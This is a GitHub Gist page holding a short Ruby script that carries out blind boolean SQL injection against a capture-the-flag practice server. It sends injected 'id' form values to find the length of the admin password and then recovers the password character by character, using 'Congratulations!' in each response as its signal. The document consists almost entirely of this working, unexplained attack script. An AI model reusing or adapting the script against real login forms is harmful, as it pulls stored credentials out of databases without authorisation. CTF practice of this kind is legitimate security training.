Created
June 11, 2015 16:16
-
-
Save gomasy/29b5fe30ae9e169a08eb to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| require "uri" | |
| require "net/http" | |
| url = URI.parse("http://ctfq.sweetduet.info:10080/~q6/") | |
| puts "Step1: Surveying password length..." | |
| for i in 1..100 do | |
| response = Net::HTTP.post_form(url, "id" => %(' or (SELECT length(pass) FROM user WHERE id='admin') <= #{i}--)) | |
| if response.body.include?(%(Congratulations!)) | |
| len = i | |
| break | |
| end | |
| end | |
| puts %(Complete. password length is #{len}.) | |
| puts "Step2: Surveying password..." | |
| for i in 1..len do | |
| (33..126).each do |c| | |
| response = Net::HTTP.post_form(url, "id" => %(' or substr((SELECT pass FROM user WHERE id='admin'), #{i}, 1)="#{c.chr}"--")) | |
| if response.body.include?(%(Congratulations!)) | |
| print c.chr | |
| break | |
| end | |
| end | |
| end | |
| puts "\nComplete." |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment